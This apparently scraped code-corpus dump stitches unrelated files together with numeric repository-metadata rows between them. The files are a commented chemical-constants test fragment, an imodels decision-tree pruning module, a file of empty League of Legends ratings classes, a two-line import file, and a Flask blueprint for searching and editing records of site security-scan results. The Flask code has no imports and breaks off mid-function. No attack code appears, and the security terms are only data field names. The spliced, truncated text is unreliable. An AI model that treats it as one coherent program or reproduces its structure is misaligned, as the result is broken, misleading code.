# df_as_dict = {'Heat of vaporization at Tb, J/mol': {'hexane': 28862.311605415733}, 'Time-weighted average exposure limit': {'hexane': "(50.0, 'ppm')"}, 'Tc, K': {'hexane': 507.60000000000002}, 'Short-term exposure limit': {'hexane': 'None'}, 'Molecular Diameter, Angstrom': {'hexane': 5.6184099999999999}, 'Zc': {'hexane': 0.26376523052422041}, 'Tm, K': {'hexane': 178.07499999999999}, 'Heat of fusion, J/mol': {'hexane': 13080.0}, 'Tb, K': {'hexane': 341.87}, 'Stockmayer parameter, K': {'hexane': 434.75999999999999}, 'MW, g/mol': {'hexane': 86.175359999999998}, 'Refractive index': {'hexane': 1.3727}, 'rhoC, kg/m^3': {'hexane': 234.17217391304345}, 'Heat of formation, J/mol': {'hexane': -166950.0}, 'Pc, Pa': {'hexane': 3025000.0}, 'Lower flammability limit, fraction': {'hexane': 0.01}, 'logP': {'hexane': 4.0}, 'Upper flammability limit, fraction': {'hexane': 0.08900000000000001}, 'Dipole moment, debye': {'hexane': 0.0}, 'Triple temperature, K': {'hexane': 177.84}, 'Acentric factor': {'hexane': 0.29749999999999999}, 'Triple pressure, Pa': {'hexane': 1.1747772750450831}, 'Autoignition temperature, K': {'hexane': 498.14999999999998}, 'Vc, m^3/mol': {'hexane': 0.000368}, 'CAS': {'hexane': '110-54-3'}, 'Formula': {'hexane': 'C6H14'}, 'Flash temperature, K': {'hexane': 251.15000000000001}, 'Heat of sublimation, J/mol': {'hexane': None}}
#
# pd.util.testing.assert_frame_equal(pd.DataFrame(df_as_dict), pd.DataFrame(df.to_dict()))
#
# df = tabulate_constants(['hexane', 'toluene'], full=True, vertical=True)
# df_as_dict = {'hexane': {'Electrical conductivity, S/m': 1e-16, 'Global warming potential': None, 'InChI key': 'VLKZOEOYAKHREP-UHFFFAOYSA-N', 'Heat of vaporization at Tb, J/mol': 28862.311605415733, 'Time-weighted average exposure limit': "(50.0, 'ppm')", 'Tc, K': 507.6, 'Short-term exposure limit': 'None', 'Molecular Diameter, Angstrom': 5.61841, 'Formula': 'C6H14', 'InChI': 'C6H14/c1-3-5-6-4-2/h3-6H2,1-2H3', 'Parachor': 272.1972168105559, 'Heat of fusion, J/mol': 13080.0, 'Tb, K': 341.87, 'Stockmayer parameter, K': 434.76, 'IUPAC name': 'hexane', 'Refractive index': 1.3727, 'Tm, K': 178.075, 'solubility parameter, Pa^0.5': 14848.17694628013, 'Heat of formation, J/mol': -166950.0, 'Pc, Pa': 3025000.0, 'Lower flammability limit, fraction': 0.01, 'Vc, m^3/mol': 0.000368, 'Upper flammability limit, fraction': 0.08900000000000001, 'Dipole moment, debye': 0.0, 'MW, g/mol': 86.17536, 'Acentric factor': 0.2975, 'rhoC, kg/m^3': 234.17217391304345, 'Zc': 0.2637652305242204, 'Triple pressure, Pa': 1.1747772750450831, 'Autoignition temperature, K': 498.15, 'CAS': '110-54-3', 'smiles': 'CCCCCC', 'Flash temperature, K': 251.15, 'Ozone depletion potential': None, 'logP': 4.0, 'Heat of sublimation, J/mol': None, 'Triple temperature, K': 177.84}, 'toluene': {'Electrical conductivity, S/m': 1e-12, 'Global warming potential': None, 'InChI key': 'YXFVVABEGXRONW-UHFFFAOYSA-N', 'Heat of vaporization at Tb, J/mol': 33233.94544167449, 'Time-weighted average exposure limit': "(20.0, 'ppm')", 'Tc, K': 591.75, 'Short-term exposure limit': 'None', 'Molecular Diameter, Angstrom': 5.4545, 'Formula': 'C7H8', 'InChI': 'C7H8/c1-7-5-3-2-4-6-7/h2-6H,1H3', 'Parachor': 246.76008384965857, 'Heat of fusion, J/mol': 6639.9999999999991, 'Tb, K': 383.75, 'Stockmayer parameter, K': 350.74, 'IUPAC name': 'methylbenzene', 'Refractive index': 1.4941, 'Tm, K': 179.2, 'solubility parameter, Pa^0.5': 18242.232319337778, 'Heat of formation, J/mol': 50170.0, 'Pc, Pa': 4108000.0, 'Lower flammability limit, fraction': 0.01, 'Vc, m^3/mol': 0.00031600000000000004, 'Upper flammability limit, fraction': 0.078, 'Dipole moment, debye': 0.33, 'MW, g/mol': 92.13842, 'Acentric factor': 0.257, 'rhoC, kg/m^3': 291.5772784810126, 'Zc': 0.26384277925843774, 'Triple pressure, Pa': 0.04217711401906639, 'Autoignition temperature, K': 803.15, 'CAS': '108-88-3', 'smiles': 'CC1=CC=CC=C1', 'Flash temperature, K': 277.15, 'Ozone depletion potential': None, 'logP': 2.73, 'Heat of sublimation, J/mol': None, 'Triple temperature, K': 179.2}}
# pd.util.testing.assert_frame_equal(pd.DataFrame(df_as_dict), pd.DataFrame(df.to_dict()))
| 142.704918 | 2,516 | 0.727283 | 1,236 | 8,705 | 5.080906 | 0.342233 | 0.01242 | 0.012739 | 0.015127 | 0.325 | 0.219745 | 0.179777 | 0.146178 | 0.146178 | 0.10414 | 0 | 0.27827 | 0.104997 | 8,705 | 60 | 2,517 | 145.083333 | 0.527788 | 0.979437 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.016667 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
4d13393d79948ef488c59d260466dfce8132cd54 | 8,855 | py | Python | imodels/tree/cart_ccp.py | stjordanis/imodels | 3c31df3f3d600d3b9c07fabdffd375b93e139c50 | [
"MIT"
] | 102 | 2019-07-16T13:45:35.000Z | 2020-09-14T19:12:49.000Z | imodels/tree/cart_ccp.py | stjordanis/imodels | 3c31df3f3d600d3b9c07fabdffd375b93e139c50 | [
"MIT"
] | 2 | 2020-01-03T20:47:14.000Z | 2020-01-03T21:17:39.000Z | imodels/tree/cart_ccp.py | stjordanis/imodels | 3c31df3f3d600d3b9c07fabdffd375b93e139c50 | [
"MIT"
] | 8 | 2019-08-09T08:40:34.000Z | 2020-09-06T17:51:10.000Z | from copy import deepcopy
from typing import List
import numpy as np
from sklearn import datasets
from sklearn.base import BaseEstimator
from sklearn.model_selection import cross_val_score, train_test_split
from sklearn.tree import DecisionTreeClassifier
from imodels.tree.hierarchical_shrinkage import HSTreeRegressor, HSTreeClassifier
from imodels.util.tree import compute_tree_complexity
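# The classes below wrap a scikit-learn decision tree and use its
# cost-complexity pruning path to pick the ccp_alpha whose pruned tree matches
# a desired complexity (e.g. number of rules or leaves). The *CV variants then
# tune a hierarchical-shrinkage regularization parameter by cross-validation
# on top of the pruned tree.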
class DecisionTreeCCPClassifier(DecisionTreeClassifier):
def __init__(self, estimator_: BaseEstimator, desired_complexity: int = 1, complexity_measure='max_rules', *args,
**kwargs):
self.desired_complexity = desired_complexity
# print('est', estimator_)
self.estimator_ = estimator_
self.complexity_measure = complexity_measure
def _get_alpha(self, X, y, sample_weight=None, *args, **kwargs):
path = self.estimator_.cost_complexity_pruning_path(X, y)
ccp_alphas, impurities = path.ccp_alphas, path.impurities
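# Binary-search the pruning path for the alpha that yields the desired
# complexity: ccp_alphas comes back sorted ascending and tree complexity is
# non-increasing in alpha, so the search is well defined.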
complexities = {}
low = 0
high = len(ccp_alphas) - 1
cur = 0
while low <= high:
cur = (high + low) // 2
est_params = self.estimator_.get_params()
est_params['ccp_alpha'] = ccp_alphas[cur]
copied_estimator = deepcopy(self.estimator_).set_params(**est_params)
copied_estimator.fit(X, y)
if self._get_complexity(copied_estimator, self.complexity_measure) < self.desired_complexity:
high = cur - 1
elif self._get_complexity(copied_estimator, self.complexity_measure) > self.desired_complexity:
low = cur + 1
else:
break
self.alpha = ccp_alphas[cur]
# for alpha in ccp_alphas:
# est_params = self.estimator_.get_params()
# est_params['ccp_alpha'] = alpha
# copied_estimator = deepcopy(self.estimator_).set_params(**est_params)
# copied_estimator.fit(X, y)
# complexities[alpha] = self._get_complexity(copied_estimator,self.complexity_measure)
# closest_alpha, closest_leaves = min(complexities.items(), key=lambda x: abs(self.desired_complexity - x[1]))
# self.alpha = closest_alpha
def fit(self, X, y, sample_weight=None, *args, **kwargs):
params_for_fitting = self.estimator_.get_params()
self._get_alpha(X, y, sample_weight, *args, **kwargs)
params_for_fitting['ccp_alpha'] = self.alpha
self.estimator_.set_params(**params_for_fitting)
self.estimator_.fit(X, y, *args, **kwargs)
def _get_complexity(self, BaseEstimator, complexity_measure):
return compute_tree_complexity(BaseEstimator.tree_, complexity_measure)
def predict_proba(self, *args, **kwargs):
if hasattr(self.estimator_, 'predict_proba'):
return self.estimator_.predict_proba(*args, **kwargs)
else:
return NotImplemented
def predict(self, X, *args, **kwargs):
return self.estimator_.predict(X, *args, **kwargs)
def score(self, *args, **kwargs):
if hasattr(self.estimator_, 'score'):
return self.estimator_.score(*args, **kwargs)
else:
return NotImplemented
class DecisionTreeCCPRegressor(BaseEstimator):
def __init__(self, estimator_: BaseEstimator, desired_complexity: int = 1, complexity_measure='max_rules', *args,
**kwargs):
self.desired_complexity = desired_complexity
# print('est', estimator_)
self.estimator_ = estimator_
self.alpha = 0.0
self.complexity_measure = complexity_measure
def _get_alpha(self, X, y, sample_weight=None):
path = self.estimator_.cost_complexity_pruning_path(X, y)
ccp_alphas, impurities = path.ccp_alphas, path.impurities
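# Same binary search over the pruning path as in the classifier above.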
complexities = {}
low = 0
high = len(ccp_alphas) - 1
cur = 0
while low <= high:
cur = (high + low) // 2
est_params = self.estimator_.get_params()
est_params['ccp_alpha'] = ccp_alphas[cur]
copied_estimator = deepcopy(self.estimator_).set_params(**est_params)
copied_estimator.fit(X, y)
if self._get_complexity(copied_estimator, self.complexity_measure) < self.desired_complexity:
high = cur - 1
elif self._get_complexity(copied_estimator, self.complexity_measure) > self.desired_complexity:
low = cur + 1
else:
break
self.alpha = ccp_alphas[cur]
# path = self.estimator_.cost_complexity_pruning_path(X,y)
# ccp_alphas, impurities = path.ccp_alphas, path.impurities
# complexities = {}
# for alpha in ccp_alphas:
# est_params = self.estimator_.get_params()
# est_params['ccp_alpha'] = alpha
# copied_estimator = deepcopy(self.estimator_).set_params(**est_params)
# copied_estimator.fit(X, y)
# complexities[alpha] = self._get_complexity(copied_estimator,self.complexity_measure)
# closest_alpha, closest_leaves = min(complexities.items(), key=lambda x: abs(self.desired_complexity - x[1]))
# self.alpha = closest_alpha
def fit(self, X, y, sample_weight=None):
params_for_fitting = self.estimator_.get_params()
self._get_alpha(X, y, sample_weight)
params_for_fitting['ccp_alpha'] = self.alpha
self.estimator_.set_params(**params_for_fitting)
self.estimator_.fit(X, y)
def _get_complexity(self, BaseEstimator, complexity_measure):
return compute_tree_complexity(BaseEstimator.tree_, self.complexity_measure)
def predict(self, X, *args, **kwargs):
return self.estimator_.predict(X, *args, **kwargs)
def score(self, *args, **kwargs):
if hasattr(self.estimator_, 'score'):
return self.estimator_.score(*args, **kwargs)
else:
return NotImplemented
class HSDecisionTreeCCPRegressorCV(HSTreeRegressor):
def __init__(self, estimator_: BaseEstimator, reg_param_list: List[float] = [0.1, 1, 10, 50, 100, 500],
desired_complexity: int = 1, cv: int = 3, scoring=None, *args, **kwargs):
super().__init__(estimator_=estimator_, reg_param=None)
self.reg_param_list = np.array(reg_param_list)
self.cv = cv
self.scoring = scoring
self.desired_complexity = desired_complexity
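# Two-stage fit: first prune the base tree to the desired complexity via
# cost-complexity pruning, then pick the hierarchical-shrinkage reg_param
# that maximizes the cross-validated score.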
def fit(self, X, y, sample_weight=None, *args, **kwargs):
m = DecisionTreeCCPRegressor(self.estimator_, desired_complexity=self.desired_complexity)
m.fit(X, y, sample_weight, *args, **kwargs)
self.scores_ = []
for reg_param in self.reg_param_list:
est = HSTreeRegressor(deepcopy(m.estimator_), reg_param)
cv_scores = cross_val_score(est, X, y, cv=self.cv, scoring=self.scoring)
self.scores_.append(np.mean(cv_scores))
self.reg_param = self.reg_param_list[np.argmax(self.scores_)]
super().fit(X=X, y=y)
class HSDecisionTreeCCPClassifierCV(HSTreeClassifier):
def __init__(self, estimator_: BaseEstimator, reg_param_list: List[float] = [0.1, 1, 10, 50, 100, 500],
desired_complexity: int = 1, cv: int = 3, scoring=None, *args, **kwargs):
super().__init__(estimator_=estimator_, reg_param=None)
self.reg_param_list = np.array(reg_param_list)
self.cv = cv
self.scoring = scoring
self.desired_complexity = desired_complexity
def fit(self, X, y, sample_weight=None, *args, **kwargs):
m = DecisionTreeCCPClassifier(self.estimator_, desired_complexity=self.desired_complexity)
m.fit(X, y, sample_weight, *args, **kwargs)
self.scores_ = []
for reg_param in self.reg_param_list:
est = HSTreeClassifier(deepcopy(m.estimator_), reg_param)
cv_scores = cross_val_score(est, X, y, cv=self.cv, scoring=self.scoring)
self.scores_.append(np.mean(cv_scores))
self.reg_param = self.reg_param_list[np.argmax(self.scores_)]
super().fit(X=X, y=y)
if __name__ == '__main__':
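# Quick smoke test: prune a classifier to about 10 leaf nodes on the
# breast-cancer data, then cross-validate shrinkage on the pruned tree.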
m = DecisionTreeCCPClassifier(estimator_=DecisionTreeClassifier(random_state=1), desired_complexity=10,
complexity_measure='max_leaf_nodes')
# X,y = make_friedman1() #For regression
X, y = datasets.load_breast_cancer(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(
X, y, test_size=0.33, random_state=42)
m.fit(X_train, y_train)
m.predict(X_test)
print(m.score(X_test, y_test))
m = HSDecisionTreeCCPClassifierCV(estimator_=DecisionTreeClassifier(random_state=1), desired_complexity=10,
reg_param_list=[0.0, 0.1, 1.0, 5.0, 10.0, 25.0, 50.0, 100.0])
m.fit(X_train, y_train)
print(m.score(X_test, y_test))
| 44.722222 | 118 | 0.65974 | 1,077 | 8,855 | 5.121634 | 0.119777 | 0.077774 | 0.045685 | 0.025381 | 0.822335 | 0.816171 | 0.808557 | 0.794416 | 0.770123 | 0.770123 | 0 | 0.011928 | 0.233089 | 8,855 | 197 | 119 | 44.949239 | 0.800324 | 0.124449 | 0 | 0.732877 | 0 | 0 | 0.012809 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.116438 | false | 0 | 0.061644 | 0.027397 | 0.273973 | 0.013699 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4d22a901abdddbb7dd9e7d2feddb7d3e95c4d549 | 7,097 | py | Python | loldib/getratings/models/NA/na_blitzcrank/na_blitzcrank_top.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | loldib/getratings/models/NA/na_blitzcrank/na_blitzcrank_top.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | loldib/getratings/models/NA/na_blitzcrank/na_blitzcrank_top.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | from getratings.models.ratings import Ratings
class NA_Blitzcrank_Top_Aatrox(Ratings):
pass
class NA_Blitzcrank_Top_Ahri(Ratings):
pass
class NA_Blitzcrank_Top_Akali(Ratings):
pass
class NA_Blitzcrank_Top_Alistar(Ratings):
pass
class NA_Blitzcrank_Top_Amumu(Ratings):
pass
class NA_Blitzcrank_Top_Anivia(Ratings):
pass
class NA_Blitzcrank_Top_Annie(Ratings):
pass
class NA_Blitzcrank_Top_Ashe(Ratings):
pass
class NA_Blitzcrank_Top_AurelionSol(Ratings):
pass
class NA_Blitzcrank_Top_Azir(Ratings):
pass
class NA_Blitzcrank_Top_Bard(Ratings):
pass
class NA_Blitzcrank_Top_Blitzcrank(Ratings):
pass
class NA_Blitzcrank_Top_Brand(Ratings):
pass
class NA_Blitzcrank_Top_Braum(Ratings):
pass
class NA_Blitzcrank_Top_Caitlyn(Ratings):
pass
class NA_Blitzcrank_Top_Camille(Ratings):
pass
class NA_Blitzcrank_Top_Cassiopeia(Ratings):
pass
class NA_Blitzcrank_Top_Chogath(Ratings):
pass
class NA_Blitzcrank_Top_Corki(Ratings):
pass
class NA_Blitzcrank_Top_Darius(Ratings):
pass
class NA_Blitzcrank_Top_Diana(Ratings):
pass
class NA_Blitzcrank_Top_Draven(Ratings):
pass
class NA_Blitzcrank_Top_DrMundo(Ratings):
pass
class NA_Blitzcrank_Top_Ekko(Ratings):
pass
class NA_Blitzcrank_Top_Elise(Ratings):
pass
class NA_Blitzcrank_Top_Evelynn(Ratings):
pass
class NA_Blitzcrank_Top_Ezreal(Ratings):
pass
class NA_Blitzcrank_Top_Fiddlesticks(Ratings):
pass
class NA_Blitzcrank_Top_Fiora(Ratings):
pass
class NA_Blitzcrank_Top_Fizz(Ratings):
pass
class NA_Blitzcrank_Top_Galio(Ratings):
pass
class NA_Blitzcrank_Top_Gangplank(Ratings):
pass
class NA_Blitzcrank_Top_Garen(Ratings):
pass
class NA_Blitzcrank_Top_Gnar(Ratings):
pass
class NA_Blitzcrank_Top_Gragas(Ratings):
pass
class NA_Blitzcrank_Top_Graves(Ratings):
pass
class NA_Blitzcrank_Top_Hecarim(Ratings):
pass
class NA_Blitzcrank_Top_Heimerdinger(Ratings):
pass
class NA_Blitzcrank_Top_Illaoi(Ratings):
pass
class NA_Blitzcrank_Top_Irelia(Ratings):
pass
class NA_Blitzcrank_Top_Ivern(Ratings):
pass
class NA_Blitzcrank_Top_Janna(Ratings):
pass
class NA_Blitzcrank_Top_JarvanIV(Ratings):
pass
class NA_Blitzcrank_Top_Jax(Ratings):
pass
class NA_Blitzcrank_Top_Jayce(Ratings):
pass
class NA_Blitzcrank_Top_Jhin(Ratings):
pass
class NA_Blitzcrank_Top_Jinx(Ratings):
pass
class NA_Blitzcrank_Top_Kalista(Ratings):
pass
class NA_Blitzcrank_Top_Karma(Ratings):
pass
class NA_Blitzcrank_Top_Karthus(Ratings):
pass
class NA_Blitzcrank_Top_Kassadin(Ratings):
pass
class NA_Blitzcrank_Top_Katarina(Ratings):
pass
class NA_Blitzcrank_Top_Kayle(Ratings):
pass
class NA_Blitzcrank_Top_Kayn(Ratings):
pass
class NA_Blitzcrank_Top_Kennen(Ratings):
pass
class NA_Blitzcrank_Top_Khazix(Ratings):
pass
class NA_Blitzcrank_Top_Kindred(Ratings):
pass
class NA_Blitzcrank_Top_Kled(Ratings):
pass
class NA_Blitzcrank_Top_KogMaw(Ratings):
pass
class NA_Blitzcrank_Top_Leblanc(Ratings):
pass
class NA_Blitzcrank_Top_LeeSin(Ratings):
pass
class NA_Blitzcrank_Top_Leona(Ratings):
pass
class NA_Blitzcrank_Top_Lissandra(Ratings):
pass
class NA_Blitzcrank_Top_Lucian(Ratings):
pass
class NA_Blitzcrank_Top_Lulu(Ratings):
pass
class NA_Blitzcrank_Top_Lux(Ratings):
pass
class NA_Blitzcrank_Top_Malphite(Ratings):
pass
class NA_Blitzcrank_Top_Malzahar(Ratings):
pass
class NA_Blitzcrank_Top_Maokai(Ratings):
pass
class NA_Blitzcrank_Top_MasterYi(Ratings):
pass
class NA_Blitzcrank_Top_MissFortune(Ratings):
pass
class NA_Blitzcrank_Top_MonkeyKing(Ratings):
pass
class NA_Blitzcrank_Top_Mordekaiser(Ratings):
pass
class NA_Blitzcrank_Top_Morgana(Ratings):
pass
class NA_Blitzcrank_Top_Nami(Ratings):
pass
class NA_Blitzcrank_Top_Nasus(Ratings):
pass
class NA_Blitzcrank_Top_Nautilus(Ratings):
pass
class NA_Blitzcrank_Top_Nidalee(Ratings):
pass
class NA_Blitzcrank_Top_Nocturne(Ratings):
pass
class NA_Blitzcrank_Top_Nunu(Ratings):
pass
class NA_Blitzcrank_Top_Olaf(Ratings):
pass
class NA_Blitzcrank_Top_Orianna(Ratings):
pass
class NA_Blitzcrank_Top_Ornn(Ratings):
pass
class NA_Blitzcrank_Top_Pantheon(Ratings):
pass
class NA_Blitzcrank_Top_Poppy(Ratings):
pass
class NA_Blitzcrank_Top_Quinn(Ratings):
pass
class NA_Blitzcrank_Top_Rakan(Ratings):
pass
class NA_Blitzcrank_Top_Rammus(Ratings):
pass
class NA_Blitzcrank_Top_RekSai(Ratings):
pass
class NA_Blitzcrank_Top_Renekton(Ratings):
pass
class NA_Blitzcrank_Top_Rengar(Ratings):
pass
class NA_Blitzcrank_Top_Riven(Ratings):
pass
class NA_Blitzcrank_Top_Rumble(Ratings):
pass
class NA_Blitzcrank_Top_Ryze(Ratings):
pass
class NA_Blitzcrank_Top_Sejuani(Ratings):
pass
class NA_Blitzcrank_Top_Shaco(Ratings):
pass
class NA_Blitzcrank_Top_Shen(Ratings):
pass
class NA_Blitzcrank_Top_Shyvana(Ratings):
pass
class NA_Blitzcrank_Top_Singed(Ratings):
pass
class NA_Blitzcrank_Top_Sion(Ratings):
pass
class NA_Blitzcrank_Top_Sivir(Ratings):
pass
class NA_Blitzcrank_Top_Skarner(Ratings):
pass
class NA_Blitzcrank_Top_Sona(Ratings):
pass
class NA_Blitzcrank_Top_Soraka(Ratings):
pass
class NA_Blitzcrank_Top_Swain(Ratings):
pass
class NA_Blitzcrank_Top_Syndra(Ratings):
pass
class NA_Blitzcrank_Top_TahmKench(Ratings):
pass
class NA_Blitzcrank_Top_Taliyah(Ratings):
pass
class NA_Blitzcrank_Top_Talon(Ratings):
pass
class NA_Blitzcrank_Top_Taric(Ratings):
pass
class NA_Blitzcrank_Top_Teemo(Ratings):
pass
class NA_Blitzcrank_Top_Thresh(Ratings):
pass
class NA_Blitzcrank_Top_Tristana(Ratings):
pass
class NA_Blitzcrank_Top_Trundle(Ratings):
pass
class NA_Blitzcrank_Top_Tryndamere(Ratings):
pass
class NA_Blitzcrank_Top_TwistedFate(Ratings):
pass
class NA_Blitzcrank_Top_Twitch(Ratings):
pass
class NA_Blitzcrank_Top_Udyr(Ratings):
pass
class NA_Blitzcrank_Top_Urgot(Ratings):
pass
class NA_Blitzcrank_Top_Varus(Ratings):
pass
class NA_Blitzcrank_Top_Vayne(Ratings):
pass
class NA_Blitzcrank_Top_Veigar(Ratings):
pass
class NA_Blitzcrank_Top_Velkoz(Ratings):
pass
class NA_Blitzcrank_Top_Vi(Ratings):
pass
class NA_Blitzcrank_Top_Viktor(Ratings):
pass
class NA_Blitzcrank_Top_Vladimir(Ratings):
pass
class NA_Blitzcrank_Top_Volibear(Ratings):
pass
class NA_Blitzcrank_Top_Warwick(Ratings):
pass
class NA_Blitzcrank_Top_Xayah(Ratings):
pass
class NA_Blitzcrank_Top_Xerath(Ratings):
pass
class NA_Blitzcrank_Top_XinZhao(Ratings):
pass
class NA_Blitzcrank_Top_Yasuo(Ratings):
pass
class NA_Blitzcrank_Top_Yorick(Ratings):
pass
class NA_Blitzcrank_Top_Zac(Ratings):
pass
class NA_Blitzcrank_Top_Zed(Ratings):
pass
class NA_Blitzcrank_Top_Ziggs(Ratings):
pass
class NA_Blitzcrank_Top_Zilean(Ratings):
pass
class NA_Blitzcrank_Top_Zyra(Ratings):
pass
| 17.019185 | 47 | 0.784839 | 972 | 7,097 | 5.304527 | 0.151235 | 0.187355 | 0.455004 | 0.535299 | 0.823701 | 0.823701 | 0 | 0 | 0 | 0 | 0 | 0 | 0.156545 | 7,097 | 416 | 48 | 17.060096 | 0.861343 | 0 | 0 | 0.498195 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.498195 | 0.00361 | 0 | 0.501805 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 7 |
4d43336ee7cab9b19622b60106476aad83791c83 | 87 | py | Python | src/satyrus/assets/__init__.py | pedromxavier/Satyrus3 | ed74a3c5e7271a1cb6414e524c209f26cb822ae8 | [
"MIT"
] | 1 | 2021-09-03T13:54:20.000Z | 2021-09-03T13:54:20.000Z | src/satyrus/assets/__init__.py | pedromxavier/Satyrus3 | ed74a3c5e7271a1cb6414e524c209f26cb822ae8 | [
"MIT"
] | null | null | null | src/satyrus/assets/__init__.py | pedromxavier/Satyrus3 | ed74a3c5e7271a1cb6414e524c209f26cb822ae8 | [
"MIT"
] | 2 | 2020-09-17T22:40:48.000Z | 2021-09-09T12:58:16.000Z | from .banner import __doc__ as SAT_BANNER
from .critical import __doc__ as SAT_CRITICAL | 43.5 | 45 | 0.850575 | 14 | 87 | 4.571429 | 0.5 | 0.28125 | 0.34375 | 0.4375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.126437 | 87 | 2 | 45 | 43.5 | 0.842105 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
4d4d170518026d6e25b0797af589e70d2385a42c | 8,509 | py | Python | restflaskpyexample/models/pages/pageviewback.py | armoredware/restflask | 3e4c8e38c95a1783981774994d4e3d9d84fc70b0 | [
"MIT"
] | null | null | null | restflaskpyexample/models/pages/pageviewback.py | armoredware/restflask | 3e4c8e38c95a1783981774994d4e3d9d84fc70b0 | [
"MIT"
] | null | null | null | restflaskpyexample/models/pages/pageviewback.py | armoredware/restflask | 3e4c8e38c95a1783981774994d4e3d9d84fc70b0 | [
"MIT"
] | null | null | null |
# NOTE: the snippet below begins at its first route, so the imports and the
# blueprint/model definitions it relies on are not shown. The lines here are
# assumptions inferred from usage in this file, not the original source:
# from flask import render_template, request
# from restflaskpyexample.models.pages.page import Page  # hypothetical module path
# import restflaskpyexample.models.users.decorators as user_decorators  # hypothetical
# page_blueprint is assumed to be a flask.Blueprint defined elsewhere.
@page_blueprint.route('/admin/page_search')
@user_decorators.requires_login #mike added
def admin_search():
return render_template('/pages/admin_search.html')
@page_blueprint.route('/page_search_results', methods=['POST'])
def search_results():
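# Build a page query from the submitted search fields and render the matches.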
search_phrase = request.form['search_phrase']
search_type = request.form['search_type']
search_vintage= request.form['search_vintage']
search_bottle= request.form['search_bottle']
search_country= request.form['search_country']
search_case= request.form['search_case']
page = Page.from_mongo(search_phrase, search_type, search_vintage, search_bottle, search_country, search_case)
return render_template('/pages/search_results.html', search_phrase= search_phrase, page= page)
@page_blueprint.route('/admin/page_search_results', methods=['POST'])
@user_decorators.requires_login #mike added
def admin_search_results():
search_phrase = request.form['search_phrase']
search_type = request.form['search_type']
search_vintage= request.form['search_vintage']
search_bottle= request.form['search_bottle']
search_country= request.form['search_country']
search_case= request.form['search_case']
    page = Page.from_mongo(search_phrase, search_type, search_vintage, search_bottle, search_country, search_case)
return render_template('/pages/admin_search_results.html', search_phrase= search_phrase, page= page)
@page_blueprint.route('/admin/new_page', methods=['POST', 'GET'])
@user_decorators.requires_login #mike added
def create_new_page():
if request.method == 'GET':
return render_template('/pages/new_page.html')
else:
domain= request.form['domain']
user_id= request.form['user_id']
last_mod= request.form['last_mod']
timestamp= request.form['timestamp']
url= request.form['url']
xss= request.form['xss']
sqli= request.form['sqli']
sql= request.form['sql']
csrf= request.form['csrf']
hash= request.form['hash']
uptime= request.form['uptime']
loadspeed= request.form['loadspeed']
pagecontent= request.form['pagecontent']
externallinks= request.form['externallinks']
scripts= request.form['scripts']
base64= request.form['base64']
documenttype= request.form['documents']
virus= request.form['virus']
malware= request.form['malware']
reputation= request.form['reputation']
popups= request.form['popups']
bruteforce= request.form['bruteforce']
title= request.form['title']
redirect= request.form['redirect']
sensitivedata= request.form['sensitivedata']
emailaddresses= request.form['emailaddresses']
adaissues= request.form['adaissues']
        accesscontrol= request.form['accesscontrol']
        vulnerability= request.form['vulnerability']
scanned= request.form['scanned']
new_page = Page(domain, user_id, last_mod, timestamp,
url,
xss,
sqli,
sql,
csrf,
hash,
uptime,
loadspeed,
pagecontent,
externallinks,
scripts,
base64,
documenttype,
virus,
malware,
reputation,
popups,
bruteforce,
title,
redirect,
sensitivedata,
emailaddresses,
adaissues,
accesscontrol,
vulnerability,
scanned)
new_page.save_to_mongo()
#return make_response("Thanks", 200)
#return render_template('search.html')
return render_template('/pages/added_page.html')
@page_blueprint.route('/admin/edit_page/<string:page_id>', methods=['POST', 'GET'])
@user_decorators.requires_login #mike added
def edit_page(page_id):
page = Page.from_mongo_id(page_id)
if request.method == 'GET':
return render_template('/pages/edit_page.html', page_id=page_id, page= page)
else:
domain= request.form['domain']
user_id= request.form['user_id']
last_mod= request.form['last_mod']
timestamp= request.form['timestamp']
url= request.form['url']
xss= request.form['xss']
sqli= request.form['sqli']
sql= request.form['sql']
csrf= request.form['csrf']
hash= request.form['hash']
uptime= request.form['uptime']
loadspeed= request.form['loadspeed']
pagecontent= request.form['pagecontent']
externallinks= request.form['externallinks']
scripts= request.form['scripts']
base64= request.form['base64']
documenttype= request.form['documents']
virus= request.form['virus']
malware= request.form['malware']
reputation= request.form['reputation']
popups= request.form['popups']
bruteforce= request.form['bruteforce']
title= request.form['title']
redirect= request.form['redirect']
sensitivedata= request.form['sensitivedata']
emailaddresses= request.form['emailaddresses']
adaissues= request.form['adaissues']
        accesscontrol= request.form['accesscontrol']
